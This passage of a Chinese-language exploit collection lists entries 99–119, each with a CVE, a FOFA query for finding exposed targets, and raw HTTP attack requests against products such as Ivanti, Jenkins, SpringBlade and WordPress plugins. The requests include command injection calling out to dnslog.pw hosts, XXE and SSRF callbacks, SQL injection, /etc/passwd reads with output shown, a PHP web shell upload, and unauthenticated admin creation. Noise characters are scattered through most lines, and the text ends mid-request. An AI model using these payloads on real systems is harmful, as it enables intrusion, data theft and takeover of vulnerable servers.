) E0 v! i E3 }( J4 k3 A8 }+ Q0 sAccept: */*( U( V, l: }1 d- N9 i- K
Accept-Encoding: gzip, deflate; ^6 D/ f, M/ e. d1 _' H) k4 T$ t7 _
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+ o' K, `; x$ l, U3 L! O+ q EContent-Type: application/x-www-form-urlencoded; charset=UTF-8+ C$ h6 v: W$ ]
X-Requested-With: XMLHttpRequest$ D) y) [* T% L( X" `
. w, |# P1 U' e( @9 eid=1&name=cmd¶meter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B: x3 B7 p. g0 [: O, q0 n9 ^- u
& G' U2 a) X4 f6 f5 R4 Q0 T8 i6 M, y3 A% W9 n8 F
99. Ncast盈可视高清智能录播系统busiFacade RCE
$ \3 N; C2 `( I) U& S0 t$ p) q* xCVE-2024-0305
+ m x, D" m8 I- KFOFA:app="Ncast-产品" && title=="高清智能录播系统"
0 e9 Y1 Y& U; n" [/ z( APOST /classes/common/busiFacade.php HTTP/1.1+ f/ k2 ~( M# a9 y6 f. C; h# `
Host: 192.168.40.130:8080' J( i4 ?4 G9 X" D! X4 {
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0# v* t( ?+ s6 f4 K: s' t1 R
Connection: close* W6 n( ]9 u& e9 |) a- K2 ?; [
Content-Length: 154
$ F5 m6 K# j+ V5 h k2 LAccept: */*2 V s( v3 C: k3 S/ c8 t. a
Accept-Encoding: gzip, deflate4 y6 R0 a& I; T: v
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
: D5 ^* B9 `- h8 t8 M* M3 m6 nContent-Type: application/x-www-form-urlencoded; charset=UTF-8 r3 W; X- G* \+ ^ E- ]- R
X-Requested-With: XMLHttpRequest
" u+ T1 Q' e3 D' }# ^8 i
9 H6 {7 S( z& P+ M5 \' I% H% a7 t+ A- v%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D
+ O2 B E! u8 I6 U) d6 V
+ |2 t/ e4 X9 ?2 N. Q! B# g* r; Q+ {, ^, Q9 f7 o8 O
100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传8 B( Y P7 i2 S3 d0 Z
CVE-2024-0352
+ b$ a6 Y' R' hFOFA:icon_hash="874152924"
7 g% W4 P L& _' {$ V3 _POST /api/file/formimage HTTP/1.1
' ^* e; m* c5 R# {( u9 dHost: 192.168.40.130" p6 ~/ H5 ]) v
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
* ?% z3 A) t, z: `5 rConnection: close
2 E4 R* I+ a/ [5 z. |% j1 hContent-Length: 2015 |" ^( O: ~# [8 u! l' z
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei1 G/ X- [+ A9 n7 y6 O5 }
Accept-Encoding: gzip2 b& H" K% k! }4 h
+ L4 k8 I5 U+ U- L; ^/ @3 h------WebKitFormBoundarygcflwtei( B! Y: h& f- ^
Content-Disposition: form-data; name="file";filename="IE4MGP.php"
6 b. T, T* ~! V, A! o9 J$ aContent-Type: application/x-php9 U8 Z! z: a6 }' z* t J
) X0 {5 p) v( a% w, U" d3 U/ D2ayyhRXiAsKXL8olvF5s4qqyI2O- r6 _# y Q$ s' p
------WebKitFormBoundarygcflwtei--
+ J* S9 Y6 W' b2 y% r! E) w) C) }# a
& G; t4 p& j$ C. A
101. ivanti policy secure-22.6命令注入- l* x# g; J2 M. e0 C1 {* r
CVE-2024-218876 i* b9 l. O7 C l' ^
FOFA:body="welcome.cgi?p=logo"
3 d" U5 N5 H5 p) \GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1
% d3 j3 N3 f3 n pHost: x.x.x.xx.x.x.x, s3 P1 v6 a! r8 y- f& \- I; G+ [
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36; |* G" o& ?" w& {
Connection: close
+ Z. o. N+ K- dAccept-Encoding: gzip8 Y, i" ^' c0 y4 h" j
0 k% e, t$ n* B L
6 h' g- X1 d1 N0 S+ Y! r102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行
7 o6 S2 J9 {3 }$ l3 c% Q- QCVE-2024-21893
& c3 H( Z) e" t. d6 ~1 K vFOFA:body="welcome.cgi?p=logo"
( E/ J/ O1 e5 ]4 EPOST /dana-ws/saml20.ws HTTP/1.1" C$ _1 Y6 @9 K. ]. G8 u+ B7 h3 I! Z1 l$ q
Host: x.x.x.x; Z, F% C' O* U, ?
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
% ]* b% Q& ]0 EConnection: close4 D; h K4 {! n" ^0 |2 o5 P
Content-Length: 792" S7 F7 m9 H C: z
Accept-Encoding: gzip; e9 d$ `- F: ^0 ?- r7 L
, e, o7 i8 R/ q( H4 j
<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body> <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:SignedInfo> <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-cc14n#"/> <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/> </ds:SignedInfo> <<ds:SignatureValue>qwerty</ds:SignatureValue> <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/22000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><<ds:X509Data/> </ds:KeyInfo> <ds:Object></ds:Object> </ds:Signature> </soap:Body></soap:Envelope>
7 i2 H. [! J E# r$ T* g+ ?) g+ r; [
103. Ivanti Pulse Connect Secure VPN XXE
9 [" a+ {# M3 d4 gCVE-2024-22024; C" p+ u6 n( m( w, V3 H6 B
FOFA:body="welcome.cgi?p=logo"
; o1 m, A7 J% j2 |: T: MPOST /dana-na/auth/saml-sso.cgi HTTP/1.1
4 _/ x" B+ u/ Q3 B$ b3 X5 F- N' sHost: 192.168.40.130:111* H/ Q1 y+ A p* K9 D3 T( N6 q
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
) l& u; k- B, O& [: \" B. jConnection: close; l5 F% k9 R0 i0 b
Content-Length: 204- C. Q- r1 s |$ \6 X- I
Content-Type: application/x-www-form-urlencoded, _; ]: g# T5 H& B0 Y; z9 i- q) I
Accept-Encoding: gzip- U* n/ y8 t$ w2 a
& F0 @0 k/ O; Z: v" v
SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==
/ q" c* L$ k4 e7 R( j j" R& k* R* {; w9 n7 l' v3 C
1 m" \# N3 M% o( t9 C
其中SAMLRequest的值是xml文件内容的base64值,xml文件如下
+ g) P* I+ F% ?' d3 F<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM"http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>
1 M$ B* x. Y( \+ {# l: r; _2 h' D4 r; }$ [% r4 w! u
5 S2 F# S. G6 o. V. Z* `104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露
$ m' S9 |" E9 f0 L8 w9 _CVE-2024-0569: g* V) `, J: P* z9 j Z( D; M
FOFA:title="TOTOLINK"$ t2 W" w0 f3 z/ L% r
POST /cgi-bin/cstecgi.cgi HTTP/1.1) a' n; s* ?1 Z: c6 }% o+ z
Host:192.168.0.10 g' D' G! S" N& z# v3 o! `' [
Content-Length:415 h6 Q6 ~, S% l3 e
Accept:application/json,text/javascript,*/*;q=0.01
0 ^9 r8 B9 P. K! RX-Requested-with: XMLHttpRequest
0 ^5 j/ D& f- C; v. a2 _! SUser-Agent: Mozilla/5.0 (Windows NT 10.0;Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko)Chrome/99.0.4844.51Safari/537.36
9 ~4 H5 H1 N) s2 EContent-Type: application/x-www-form-urlencoded:charset=UTF-8
8 \4 d6 m* k# e& |% L( K* f- FOrigin: http://192.168.0.1. z: f$ P" n! o. u
Referer: http://192.168.0.1/advance/index.html?time=16711523805645 \# X% c- X2 j' n( [ ]
Accept-Encoding:gzip,deflate
' t- z" k+ I/ Q3 V2 E, _; WAccept-Language:zh-Tw,zh:g=0.9.en-US:g=0.8.en:g=0.7
; s6 ?$ ^; @- t% E' cConnection:close
/ R6 P. N- N- `) a# H
, l" S/ Q7 w$ Y1 c4 L6 ?5 _2 R8 `{
- ]- t- h/ j& l# D3 [/ G"topicurl":"getSysStatusCfg",7 z# H/ S# s; L# r6 l- T
"token":"". f7 }2 R6 k/ K
}: H. L# Z7 i3 r
# G. B) D! Y8 g! o105. SpringBlade v3.2.0 export-user SQL 注入
) r7 ?/ Y# E) Q, {% SFOFA:body="https://bladex.vip": s$ s6 A' M& ?. k9 m8 C4 |
http://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1
9 T% a1 @& z1 i8 Q
+ y# o: I2 s9 ^$ h# K106. SpringBlade dict-biz/list SQL 注入
& J# _' W8 X$ x1 A( X* uFOFA:body="Saber 将不能正常工作"& ^& M; m0 ]0 f3 k
GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
7 `) j- _* S$ u' ^Host: your-ip2 f6 ?7 Z! A, M9 V& ?9 @
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36* p5 ~- R" H _1 Y% }6 w1 P% c3 P
Blade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A2 k' u5 F2 P, r. e* n
Accept-Encoding: gzip, deflate
6 z% \% K- \4 gAccept-Language: zh-CN,zh;q=0.9
7 }/ ?7 }: \" g, UConnection: close
2 _* h5 f1 z: C- p3 i% Q$ o9 a$ k. x8 B
" O$ v1 g$ g- G9 o* H5 y
107. SpringBlade tenant/list SQL 注入6 U. m0 W' Z& S# p' v8 C0 u
FOFA:body="https://bladex.vip"
$ x9 Z, m- t* o KGET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1; [" B* ]7 U$ v/ Q
Host: your-ip6 C; c" T- Z" \
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.362 v8 `2 ^' P1 C- Q, G+ E$ @
Blade-Auth:替换为自己的8 J% ^, N, l9 [& R. I; ?# a
Connection: close
( F( {8 p/ b- @, ?! _' O9 ^
" \) Q9 t' S4 w) S
2 D4 f, ]! h5 f8 p3 O/ H0 F/ U108. D-Tale 3.9.0 SSRF
( v4 X/ f) w5 jCVE-2024-21642
6 B+ h; S2 w0 ~3 bFOFA:"dtale/static/images/favicon.png"/ _5 i; _2 D7 d1 r) l
GET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1
- u4 B \0 X" [& S1 _; Z: SHost: your-ip" M1 ^% K& x* ^7 F) w" ?! _1 a* H
Accept: application/json, text/plain, */* C! m7 V) x3 x' x# F6 _
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
1 X- n* I( f2 `Accept-Encoding: gzip, deflate( u- B: r* ?( I! Y$ o1 A9 e X
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
' ~+ S( b; ?1 U2 }0 `Connection: close0 z4 `& k, k% q* o7 T4 L3 g
4 Y: t z& F2 s; A; ?
% X. Z) o. u* Y/ P' O3 x0 L) ~109. Jenkins CLI 任意文件读取
4 t/ y) H) o) \2 rCVE-2024-238971 W7 Q5 U7 N9 _
FOFA:header="X-Jenkins", S% T9 [; S, t- P
POST /cli?remoting=false HTTP/1.1 Y, W/ X# D0 q
Host:( J0 E' G% w3 ~. E& y
Content-type: application/octet-stream; o: ^+ u1 R r+ j2 C
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Q; W4 @+ ]( ZSide: upload
! ]% Z* w! N* D: i! T$ ?$ xConnection: keep-alive
# e8 j$ `1 u% l" R1 I5 s) MContent-Length: 163
. P9 O8 g+ y* d- C: a. \2 R1 ~6 q/ P- A
b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'
( L; D8 T+ T* b, p9 s% i
7 a, c" m! t+ @8 M1 N
l$ D" `$ e6 C: w! [POST /cli?remoting=false HTTP/1.1
6 ^, X4 Q5 n/ [5 } Z8 SHost:
$ @( t+ t o9 q0 C3 N) TSession: 39382176-ac9c-4a00-bbc6-4172b3cf1e929 m" o4 a, I0 G$ h/ G$ A; m2 s
download+ _* t& n7 D3 M
Content-Type: application/x-www-form-urlencoded1 n2 a1 f. v# E) E+ x7 T
Content-Length: 0
+ O* q$ i7 m) k8 o: L
* e4 J* G$ U' @" A
$ d8 F0 ^! p# E" KERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
; \* g( d; j# W6 gjava -jar jenkins-cli.jar help$ \" e0 x u5 A- W7 f4 N: r$ Q5 L
[COMMAND]! g7 V* B0 s2 W3 O
Lists all the available commands or a detailed description of single command.% q% I# R9 u$ x: c$ N, X6 b
COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)
7 S. g) Y$ ^1 W1 u" b7 w+ n. d0 @
% t8 M# U9 Q$ t' x, f! y
110. Goanywhere MFT 未授权创建管理员" q) D5 e5 D& ~7 q8 {7 n
CVE-2024-0204! \! G& O6 s; Z
FOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"
5 j- G; `) A# V' I- _2 C3 L% eGET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1. q( ^+ v/ E y5 ]
Host: 192.168.40.130:8000
* a( O5 ?- p& P2 N$ T h' f2 JUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36
1 U; ?# u$ W; y; y6 X- u1 a- QConnection: close: f* m8 x5 }% S: \, ~
Accept: */*5 @) o# [# s; h! g- [+ N# l* k
Accept-Language: en
2 f6 y+ V6 t. CAccept-Encoding: gzip! x5 h9 X* |" C1 u. U! n a
. t2 V/ h% r; ?+ L- h8 E8 P
) R9 \/ K2 B4 [2 s7 y) d' ?" m9 P111. WordPress Plugin HTML5 Video Player SQL注入
9 f; _: |/ X; F4 k; P- |- W1 hCVE-2024-1061
5 }0 I) g$ W" S2 a; \3 Z0 wFOFA:"wordpress" && body="html5-video-player"$ p+ ~. G: a- Z
GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1
q. U) R3 d% |3 d! `+ u! F4 CHost: 192.168.40.130:1121 a, E& ~0 w o
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36" B" w+ P# E" k
Connection: close
; K3 j# I) v% @5 E7 y1 L4 x+ jAccept: */*
) z# E& e Z6 k5 ?! mAccept-Language: en( e$ x; o, O' l- X7 f
Accept-Encoding: gzip: Z+ @8 @5 _$ L1 ]& g; o: W+ F) Q
1 L ]4 t7 W1 E9 R
& u) `* G2 P' ^) A* @112. WordPress Plugin NotificationX SQL 注入8 }* r0 G2 w; g+ z: `: ]1 k* b
CVE-2024-16982 r) B& E2 @/ G8 k* W/ l$ H
FOFA:body="/wp-content/plugins/notificationx"
/ O) {4 g- T7 O6 m- APOST /wp-json/notificationx/v1/analytics HTTP/1.1
" z/ L6 F5 f( J+ j0 JHost: {{Hostname}} c7 O1 } E$ O; I. k* _5 t
Content-Type: application/json
( h$ V+ @4 O' Z/ u8 L8 \
: d2 L1 N8 z. @, e o0 I{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}+ s q5 _- f) ^% ^3 v4 x; O( x: s4 s0 f
! n! p$ U+ N- [1 l
( |/ w' B# o1 r3 X2 C! y113. WordPress Automatic 插件任意文件下载和SSRF
' J7 \# i1 v4 m) C- v2 wCVE-2024-27954
' f+ D- B& p& I0 ~3 Q+ KFOFA:"/wp-content/plugins/wp-automatic"
7 q+ @& D* X. R/ K6 `GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1
1 N' g' v6 ~- O8 {; pHost: x.x.x.x+ y& u& P8 M# k0 B. e* M" i, B
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.363 v. Y9 |; ]4 G G& K, R
Connection: close! ^% d9 Q0 m* u0 f+ h* t
Accept: */*
; g; Q5 L0 G p) D$ ^9 f/ eAccept-Language: en5 f8 u7 T4 b' L
Accept-Encoding: gzip
/ _) F' ~! O7 S& E" a o% s' n
+ g9 J, U; C' D# s% l; P9 {. L# j$ g( d
114. WordPress MasterStudy LMS插件 SQL注入
* U* o" `3 [2 W; X) g/ ?5 pFOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"
5 M) U1 h: \$ @) b' UGET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1' x. y {" \! }4 a7 a3 L
Host: your-ip- ]* P2 r3 ~0 }" s
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.368 v% W" r9 b6 F$ B) G
Accept-Charset: utf-85 d! i; G& ^5 V$ P1 }( @6 V$ P9 ~
Accept-Encoding: gzip, deflate
4 {5 n T, e3 a# x" IConnection: close
( y3 h; }4 C0 i7 i) u1 B! g. W, O9 E3 A
0 w1 @3 p5 y* ^, d
115. WordPress Bricks Builder <= 1.9.6 RCE' f/ r$ j ]5 S& n* p. t
CVE-2024-25600
: C4 Z1 L, \1 ?FOFA: body="/wp-content/themes/bricks/"4 I% G8 ~" |+ h) x: c1 G
第一步,获取网站的nonce值( g- H' x' D: Y. F) t( h: c4 P; C' h
GET / HTTP/1.1
6 J! J" B# }; z' I2 [9 i4 W1 xHost: x.x.x.x6 t ?: U9 r, t" d
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
7 j/ U( P& e/ v! J* C( ]Connection: close
" _5 u2 [2 S2 _" v6 G5 t D: UAccept-Encoding: gzip
6 R+ X7 P$ M v% M( B6 N/ k6 F# l F
) W6 ^* n; n: Q7 B! E7 ]
第二步替换nonce值,执行命令
& B6 ~$ g2 P: |- s$ C& OPOST /wp-json/bricks/v1/render_element HTTP/1.1
, |* [+ I$ w M' @2 K, v" EHost: x.x.x.x
; F4 `( I, z3 U& LUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
5 t- A8 N+ z# c" ?$ fConnection: close" {7 ^6 \& e. O9 r
Content-Length: 356
* s; u* Z) g6 sContent-Type: application/json0 [6 o6 @9 I O1 i: Q
Accept-Encoding: gzip
; t. B- h f6 T0 N3 C. a
; r% v9 R i, u& p9 }{
+ @0 M4 `" T5 I0 H- l" j! s' J Q"postId": "1",! o0 |( ~5 u4 `3 u7 p& G8 X4 [
"nonce": "第一步获得的值",4 l" A" }8 U, x4 t: C' y$ d! P0 Y& ]4 L. O6 t
"element": {, A! g7 m$ F7 J5 x4 J
"name": "container",2 m$ W- i) y0 U, ]6 M
"settings": {
$ A: b* Z. q% d/ B0 ~+ P* g "hasLoop": "true",4 A8 ^( H( w; ^6 L/ f7 T3 t; L
"query": {* F! ?# d5 k/ d8 \
"useQueryEditor": true,+ t' M+ y& t- F/ K/ g4 n% Z
"queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",2 A# i. U2 n$ g$ g1 l+ D1 k
"objectType": "post"0 r- X$ \4 u& o* n/ u
}0 h+ L0 M" I9 s$ G. g! F/ U
}+ N: Z9 Z* A, r, p
}7 n9 n/ ]+ b1 \4 _ a: ^
}* \4 P9 q. q9 ^7 y) g
: y3 L1 j' K. t7 G
9 P$ E# F/ s7 V- R$ [116. wordpress js-support-ticket文件上传
0 O9 l6 } Q! `9 WFOFA:body="wp-content/plugins/js-support-ticket"/ n4 ~0 R5 k( G& i6 l
POST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1
/ D0 N; x; }( m, Q1 [ v, Z* b9 H/ wHost:
5 V2 E2 k G7 iContent-Type: multipart/form-data; boundary=--------7670991715 E# K5 U: K6 S' }& ]& V- A
User-Agent: Mozilla/5.0
& w$ `8 h' ?0 ~! H Y. K; o& [3 { T
----------767099171
1 K( @+ n- z' D/ vContent-Disposition: form-data; name="action"+ s/ D; I& l# C' e# H+ ?. ]7 t% V
configuration_saveconfiguration
4 p+ M6 n! ^( i$ @# m----------767099171% u. M; g; r: t2 e9 i
Content-Disposition: form-data; name="form_request"7 l- b/ z+ J6 w+ T0 G( |0 j6 V/ H
jssupportticket8 W1 i7 n0 S: R! K- n0 ?, g3 S$ Q
----------767099171
& j- |+ V5 z) P: I2 F, x5 m. p q' hContent-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"
; Q! }3 b7 L5 Q: e" t/ K& MContent-Type: image/png
6 ?* @+ n0 z- L; R2 L----------767099171--0 M! G. r g1 P
2 I, X1 O5 F4 s2 O
R% `" J5 s L+ A, \8 B4 h+ M" }
117. WordPress LayerSlider插件SQL注入( O9 C: l5 C& U. I
version:7.9.11 – 7.10.09 D( ]: C6 A- I3 p
FOFA:body="/wp-content/plugins/LayerSlider/"% h; V0 Q( N" Y; i9 K9 C: M
GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.16 S5 ~. D* i: @6 K; f% d/ Y( r
Host: your-ip4 E" N3 d' }4 s
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0% ~ m" d6 A) {+ l* j
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8. V( V, f/ |1 x+ R
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2; W; D) l# H4 _# J2 |* S
Accept-Encoding: gzip, deflate, br
, ?) Z. s" T( u% l# x6 pConnection: close
3 y( ` j7 h$ ]4 K, FUpgrade-Insecure-Requests: 1. X8 s: _1 |4 N3 Z; m; L
% k: {6 b/ I5 g3 K9 M( Q& q
1 \9 p2 ]/ i" n5 b5 D! u. Q118. 北京百绰智能S210管理平台uploadfile.php任意文件上传; h% w+ w' d6 |) n: h, H
CVE-2024-0939
4 c* M( u5 Q# O6 c1 n4 S) nFOFA:title="Smart管理平台"0 I' u% }1 j% G% m+ @* G* F k
POST /Tool/uploadfile.php? HTTP/1.1
3 n; U" S1 `) W& n" [Host: 192.168.40.130:8443
: S2 i/ R3 ^0 W8 ?& P, z: q) oCookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8
2 W. n) l9 n" b' \0 Y8 v. uUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0! b* j& w+ U9 I+ y( m
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
( `' ^5 i- ]( FAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
6 j& W* E9 t5 [+ XAccept-Encoding: gzip, deflate
% V# X7 p" P% E$ d# lContent-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887, [& G0 O2 }3 W% N1 l
Content-Length: 405
5 }& K) W' x8 {/ d# E. J. _Origin: https://192.168.40.130:8443$ O/ E4 L, v5 _# V7 D, W# {
Referer: https://192.168.40.130:8443/Tool/uploadfile.php( u& z" k( @% N6 r; b0 I; e0 L; t
Upgrade-Insecure-Requests: 1
* D3 A3 {. z- S# a! B0 N1 vSec-Fetch-Dest: document8 j- a+ C8 f6 ]& P! m
Sec-Fetch-Mode: navigate
, S% p- b: D7 x3 W9 t, ISec-Fetch-Site: same-origin
1 h8 S2 C& r0 s0 aSec-Fetch-User: ?17 A( T8 u6 a! w+ b
Te: trailers3 J) |5 I( d+ F5 R; u
Connection: close# E/ v0 `# Y# W5 B8 y0 |
8 Z6 O8 P. B& d/ Q' s0 X( U. _: A-----------------------------13979701222747646634037182887
& }8 }/ P0 I( H9 z0 M+ KContent-Disposition: form-data; name="file_upload"; filename="contents.php"
+ m" b8 p: O7 H9 M1 x" AContent-Type: application/octet-stream8 ]/ l9 c2 u- i. G; ^% b/ S
8 P/ `1 @$ \. h* L# v5 R$ l0 {
<?php# U# |$ C }0 J
system($_POST["passwd"]);
% e; Y- Q( l8 d' Q6 F& \0 l?>
/ O* G) z" h# O* c ?-----------------------------13979701222747646634037182887
& G# W. d0 G5 {! J1 @Content-Disposition: form-data; name="txt_path"
% M3 Q$ I' Z) [
9 b# c( d1 B3 Z7 Y( x' p/home/src.php5 f J4 o& b: _% t$ \2 J
-----------------------------13979701222747646634037182887--
8 n" P* Z8 s$ U& a t
) a4 s) s s8 \. C& k- ]: }" I
9 x5 S9 z: u( l访问/home/src.php) A4 c! @) D% j. I* n6 j% F# k
, n) \! m0 U+ s5 t9 ~
119. 北京百绰智能S20后台sysmanageajax.php sql注入
4 B3 A* c5 A3 r4 \: B+ |CVE-2024-1254
6 Z _% B- R* L1 c5 x& i) v4 E3 ^FOFA:title="Smart管理平台"
m/ u9 m* A- X9 k1 s. ]; D( \先登录进入系统,默认账号密码为admin/admin
7 I* z0 v$ m6 r3 l2 V3 UPOST /sysmanage/sysmanageajax.php HTTP/1.11# |8 m2 J z! v* Y0 C
Host: x.x.x.x/ P3 p) S1 v4 @, l
Cookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee
; d+ G9 q; m; e, i/ ^9 e+ u- i* CUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0) m1 a1 Y+ s) X8 m8 Z
Accept: */*
2 H) z0 I" |7 E' s1 o& l JAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
. H; X! k* G# wAccept-Encoding: gzip, deflate
/ b' g. I& q3 M' rContent-Type: application/x-www-form-urlencoded;
a3 m" I! a: Y5 E3 q$ e3 |- iContent-Length: 1095 D3 w" O3 n. R5 `% [% j8 l$ i1 S
Origin: https://58.18.133.60:8443
. [) u, ~( H! Y4 m) \' {( l: O. KReferer: https://58.18.133.60:8443/sysmanage/manageadmin.php* Z% Z5 u3 O4 P" i& u" w. X
Sec-Fetch-Dest: empty; u' J3 ?7 R. y/ d! a
Sec-Fetch-Mode: cors0 n% x# {1 e3 F) K7 D H4 I
Sec-Fetch-Site: same-origin
3 B, `2 R+ K ]! ^( {- K' fX-Forwarded-For: 1.1.1.1
; ^( C% j. A2 ?8 sX-Originating-Ip: 1.1.1.1
